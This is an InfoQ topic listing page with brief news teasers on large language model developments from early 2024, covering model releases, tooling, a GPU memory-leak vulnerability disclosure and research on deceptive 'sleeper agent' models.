InfoQ Homepage Large language models Content on InfoQ
-
eBay’s Lessons Learned about Generative AI in Software Development Productivity
Recently eBay disclosed the lessons learned about the application of generative AI in the development process. eBay's AI endeavors have uncovered three pivotal avenues toward enhancing developer productivity: through the integration of commercial offerings, fine-tuning existing Large Language Models (LLMs), and harnessing an internal knowledge network.
-
Eric Evans Encourages DDD Practitioners to Experiment with LLMs
In his keynote presentation at Explore DDD 2024 in Denver, Colorado, Eric Evans, author of Domain-Driven Design, argued that software designers need to look for innovative ways to incorporate large language models. He encouraged conference attendees to start learning about LLMs and conducting experiments now, and sharing those results with the community.
-
RWKV Project Open-Sources LLM Eagle 7B
The RWKV Project recently open-sourced Eagle 7B, a 7.52B parameter large language model (LLM). Eagle 7B is trained on 1.1 trillion tokens of text in over 100 languages and outperforms other similarly-sized models on multilingual benchmarks.
-
Enhanced Protection for Large Language Models (LLMs) against Cyber Threats with Cloudflare for AI
Cloudflare recently announced a new capability called Firewall for AI in its Web Application Firewall (WAF) offering. The capability adds a new layer of protection that will identify abuse and attacks before they reach and tamper with Large Language Models (LLMs).
-
Mistral AI Models Are Now Available on Amazon Bedrock
Mistral AI has made its Mixtral 8x7B and Mistral 7B foundation models available on Amazon Bedrock. These models, now accessible via Amazon Bedrock's single API, aim to offer users a broader selection of high-performing models for building generative AI applications.
-
Google Introduces Gemma, a New Open Source AI Model for Developers
Google announced the launch of Gemma, a new open source AI model. Developed using the technology that underpinned Google's Gemini AI models, Gemma aims to provide developers with advanced tools to create AI applications conscientiously.
-
Google Renames Bard to Gemini
Google announced that their Bard chatbot will now be called Gemini. The company also announced the launch of Gemini Advanced, the largest version of their Gemini language model, along with two new mobile apps for interacting with the model.
-
OpenAI Launches AI Text-to-Video Generator Sora
Sora is OpenAI's new generative AI model to create videos from textual prompts. Currently in preview, the new model is able to create photorealistic videos up to 60 seconds long leveraging its ability to understand how things exist in the real world and combining multiple shots together without character or style disruption.
-
NVIDIA Introduces Metropolis Microservices for Jetson to Run AI Apps at the Edge
NVIDIA has expanded its Nvidia Metropolis Microservices Cloud-based AI solution to run on the NVIDIA Jetson IoT embedded platform, including support for video streaming and AI-based perception.
-
Meta Releases Code Generation Model Code Llama 70B, Nearing GPT-3.5 Performance
Code Llama 70B is Meta's new code generation AI model. Thanks to its 70 billion parameters, it is "the largest and best-performing model in the Code Llama family", Meta says.
-
Stability AI Releases 1.6 Billion Parameter Language Model Stable LM 2
Stability AI released two sets of pre-trained model weights for Stable LM 2, a 1.6B parameter language model. Stable LM 2 is trained on 2 trillion tokens of text data from seven languages and can be run on common laptop computers.
-
LeftoverLocals May Leak LLM Responses on Apple, Qualcomm, and AMD GPUs
Security firm Trail of Bits disclosed a vulnerability allowing malicious actors to recover data from GPU local memory on Apple, Qualcomm, AMD, and Imagination GPUs. Dubbed LeftoverLocals, the vulnerability affects any application using the GPU, including Large Language Models (LLMs) and machine learning (ML) models.
-
Mistral AI's Open-Source Mixtral 8x7B Outperforms GPT-3.5
Mistral AI recently released Mixtral 8x7B, a sparse mixture of experts (SMoE) large language model (LLM). The model contains 46.7B total parameters, but performs inference at the same speed and cost as models one-third that size. On several LLM benchmarks, it outperformed both Llama 2 70B and GPT-3.5, the model powering ChatGPT.
-
LLMs May Learn Deceptive Behavior and Act as Persistent Sleeper Agents
AI researchers at OpenAI competitor Anthropic trained proof-of-concept LLMs showing deceptive behavior triggered by specific hints in the prompts. Furthermore, they say, once deceptive behavior was trained into the model, there was no way to circumvent it using standard techniques.
-
Google Announces Video Generation LLM VideoPoet
Google Research recently published their work on VideoPoet, a large language model (LLM) that can generate video. VideoPoet was trained on 2 trillion tokens of text, audio, image, and video data, and in evaluations by human judges its output was preferred over that of other models.